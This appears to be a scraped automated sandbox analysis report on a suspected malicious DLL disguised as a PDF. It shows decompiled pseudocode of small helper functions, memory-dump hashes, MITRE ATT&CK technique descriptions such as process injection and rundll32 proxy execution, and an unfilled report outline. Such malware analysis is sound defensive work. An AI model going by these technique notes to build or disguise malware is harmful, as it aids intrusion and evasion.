COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E18166D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
				void* _t12;
				void* _t13;
				intOrPtr _t19;
				intOrPtr _t25;
				void* _t26;

				_t19 = __ecx;
				E6E1A9DBF(0x6e1ea4de, __ebx, __edi, __esi, 0xc);
				_t25 = _t19;
				 *((intOrPtr*)(_t26 - 0x18)) = _t25;
				 *((intOrPtr*)(_t26 - 0x14)) = 0;
				_t12 = E6E1C12E0("cannot use operator[] with a string argument with ");
				_pop(_t20);
				_push(_t12);
				_push(_t20);
				_t13 = E6E183CE1( *((intOrPtr*)(_t26 + 8)));
				 *((char*)(_t26 - 0x10)) = 0;
				 *((intOrPtr*)(_t25 + 0x10)) = 0;
				 *((intOrPtr*)(_t25 + 0x14)) = 0;
				E6E17FD0F(_t13);
				 *((intOrPtr*)(_t26 - 4)) = 0;
				 *((intOrPtr*)(_t26 - 0x14)) = 1;
				return E6E1A9D88(_t25,  *((intOrPtr*)(_t26 - 0x10)));
			}

0x6e18166d
0x6e181674
0x6e181679
0x6e18167b
0x6e181685
0x6e181688
0x6e18168d
0x6e18168e
0x6e181690
0x6e181694
0x6e181699
0x6e1816a1
0x6e1816a5
0x6e1816a8
0x6e1816ad
0x6e1816b0
0x6e1816be

APIs

__EH_prolog3.LIBCMT ref: 6E181674
_strlen.LIBCMT ref: 6E181688

Strings

cannot use operator[] with a string argument with , xrefs: 6E181680, 6E18168F, 6E181690

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_strlen
String ID: cannot use operator[] with a string argument with
API String ID: 782648989-2766135566
Opcode ID: 1f1232b47e8d8bee984d95168df70e245f59b6ba44cf058bbd6de1defcfae714
Instruction ID: faac7330eb0596b70fd59c179ad826ca1e0c7114a6d3a341b01bcd3660984873
Opcode Fuzzy Hash: 1f1232b47e8d8bee984d95168df70e245f59b6ba44cf058bbd6de1defcfae714
Instruction Fuzzy Hash: 3AF08CB0A003189FDB10DFE8D8449FFBA78AF04748F10092DE005AB240C7714E80EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1815AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6E1815AC(void* __ebx, void* __edi, void* __esi) {
				void* _t13;
				void* _t18;
				void* _t23;

				E6E1A9DBF(0x6e1ea4a3, __ebx, __edi, __esi, 0x10);
				 *(_t23 - 0x10) =  *(_t23 - 0x10) & 0x00000000;
				_t18 = _t23 - 0x1c;
				_t13 = E6E184744(_t18, "Seaso");
				 *((intOrPtr*)(_t23 - 4)) = 1;
				_push(_t18);
				_push(_t18);
				_push( *((intOrPtr*)(_t13 + 8)));
				_push(_t18);
				E6E18433B(__ebx, __edi, 1);
				 *(_t23 - 0x10) = 1;
				 *((char*)(_t23 - 4)) = 0;
				 *((intOrPtr*)(_t23 - 0x1c)) = 0x6e20eb44;
				return E6E1A9D88( *((intOrPtr*)(_t23 + 8)),  *((intOrPtr*)(_t23 + 8)));
			}

0x6e1815b3
0x6e1815b8
0x6e1815bc
0x6e1815c4
0x6e1815cc
0x6e1815cf
0x6e1815d0
0x6e1815d1
0x6e1815d4
0x6e1815d8
0x6e1815dd
0x6e1815e0
0x6e1815e7
0x6e1815f3

APIs

__EH_prolog3.LIBCMT ref: 6E1815B3

Part of subcall function 6E18433B: __EH_prolog3.LIBCMT ref: 6E184342

Strings

D n, xrefs: 6E1815E7
Seaso, xrefs: 6E1815BF

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: D n$Seaso
API String ID: 431132790-1730723312
Opcode ID: d568372114c99a804755d8d4f78f7d8f420e3e3f06f19a3d69a4031e5c5a9ac6
Instruction ID: 214698709293c9d2a73efbaa0e3c74ce98a5bb6b60014658c5586ad30ea20bb7
Opcode Fuzzy Hash: d568372114c99a804755d8d4f78f7d8f420e3e3f06f19a3d69a4031e5c5a9ac6
Instruction Fuzzy Hash: C1E06DB4810129AFDB01DBD8C819BFFBA78AF14204F008509A5556F241D7B11AC2FBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E18155B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E18155B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t14;
				void* _t20;
				void* _t24;
				void* _t25;

				_t25 = __eflags;
				E6E1A9DBF(0x6e1ea460, __ebx, __edi, __esi, 0x14);
				 *((intOrPtr*)(_t24 - 0x14)) = 0x6e238bf0;
				E6E1843F3(__ebx, __edi, 0x6e238bf0, _t25);
				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
				_t20 = _t24 - 0x20;
				_t14 = E6E184744(_t20, "Steam Whe");
				 *(_t24 - 4) = 1;
				_push(_t20);
				_push( *((intOrPtr*)(_t14 + 8)));
				E6E1842F3(__ebx, __edi, 0x6e238bf0);
				 *(_t24 - 4) = 0;
				 *((intOrPtr*)(_t24 - 0x20)) = 0x6e20eb44;
				 *(_t24 - 4) =  *(_t24 - 4) | 0xffffffff;
				return E6E1A9D88(0x6e238bf0, _t20);
			}

0x6e18155b
0x6e181562
0x6e18156c
0x6e18156f
0x6e181574
0x6e181578
0x6e181580
0x6e181585
0x6e181589
0x6e18158a
0x6e18158e
0x6e181593
0x6e181597
0x6e18159e
0x6e1815a9

APIs

__EH_prolog3.LIBCMT ref: 6E181562

Part of subcall function 6E1843F3: __EH_prolog3.LIBCMT ref: 6E1843FA

Part of subcall function 6E1842F3: __EH_prolog3.LIBCMT ref: 6E1842FA

Strings

D n, xrefs: 6E181597
Steam Whe, xrefs: 6E18157B

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: D n$Steam Whe
API String ID: 431132790-3448961164
Opcode ID: 0227525f3b0f1d6cef3bd9f1821f3f1300c97aba97e810853c49d4d04d41ff1e
Instruction ID: 871ee901867a3af17ffd7fe805ee554bebc4166c00f85cbe4ff2de80eadc9e42
Opcode Fuzzy Hash: 0227525f3b0f1d6cef3bd9f1821f3f1300c97aba97e810853c49d4d04d41ff1e
Instruction Fuzzy Hash: 54E06574800258DACF06EBD8C4047DEB6396F10314F144549E1517F190CB754BC5FBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1842F3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1842F3(void* __ebx, void* __edi, void* __esi) {
				void* _t16;
				void* _t23;

				E6E1A9DBF(0x6e1eac85, __ebx, __edi, __esi, 0xc);
				E6E1843B0(0x6e238bf0);
				 *((intOrPtr*)(_t23 - 0x18)) = 0x6e20eb44;
				 *(_t23 - 0x14) = "Steam Whe";
				 *((intOrPtr*)(_t23 - 0x10)) =  *((intOrPtr*)(_t23 + 0xc));
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				_t16 = E6E186158(_t23, _t23 - 0x18);
				 *(_t23 - 4) =  *(_t23 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t23 - 0x18)) = 0x6e20eb44;
				return E6E1A9D88(_t16, 0x6e238bf0);
			}

0x6e1842fa
0x6e184304
0x6e184311
0x6e184314
0x6e18431b
0x6e18431e
0x6e184327
0x6e18432c
0x6e184330
0x6e184338

APIs

__EH_prolog3.LIBCMT ref: 6E1842FA

Strings

D n, xrefs: 6E18430C
Steam Whe, xrefs: 6E184314

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: D n$Steam Whe
API String ID: 431132790-3448961164
Opcode ID: 2dd90b6676f4777a369a2b3b62ed00a85960e4710e6b9c95dc85375b82812ab2
Instruction ID: 12be3b30b3876400ce66c399ddb4000bc4687cb7512e278d9d19004ec26f04c8
Opcode Fuzzy Hash: 2dd90b6676f4777a369a2b3b62ed00a85960e4710e6b9c95dc85375b82812ab2
Instruction Fuzzy Hash: A2E0EDB48102199BCB00DFD8C446AEEFB7DAF40324F104609A622AF280C7745AC1ABD5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 606d810b8ff92.pdf.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Function 6E1A9B76, Relevance: 12.1, APIs: 8, Instructions: 136
COMMON

Function 6E1AFEC7, Relevance: 58.9, APIs: 32, Strings: 1, Instructions: 1115
COMMONCrypto